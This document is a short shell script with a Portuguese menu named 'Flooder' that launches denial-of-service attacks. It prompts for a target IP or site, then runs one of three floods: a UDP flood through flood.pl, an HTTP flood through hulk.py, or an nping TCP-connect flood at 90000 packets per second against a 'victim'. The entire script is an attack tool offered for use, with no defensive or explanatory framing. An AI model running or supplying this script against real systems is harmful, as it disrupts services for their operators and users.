#!/bin/sh

clear
echo "     \033[40;1;37m  Flooder  \033[0m"
echo "\033[1;37mEscolha uma das opço?s:    \033[1;37mPara Sair Ctrl + C\033[1;33m
[1] Flood.pl \033[1;30m(Flood UDP )\033[1;33m
[2] Hulk.pl \033[1;30m(Hulk.pl )\033[1;33m
[3] Nping \033[1;30m(TCP connect flood  )\033[;0m"
read -p ": " opcao

case $opcao in
1)
 echo "Digite o ip que deseja atacar"
 read -p ": " ip
 perl flood.pl $ip 80 65500 800 ;;
2)
 echo "Digite o site"
 read -p ": " site
 python hulk.py -site http://$site 2>/dev/null ;;
3)
 echo "Digite o site"
 read -p ": " vitima
 nping --tcp-connect -rate=90000 -c 900000 -q $vitima ;;
 *)
  id > /dev/null 2> /dev/null
esac
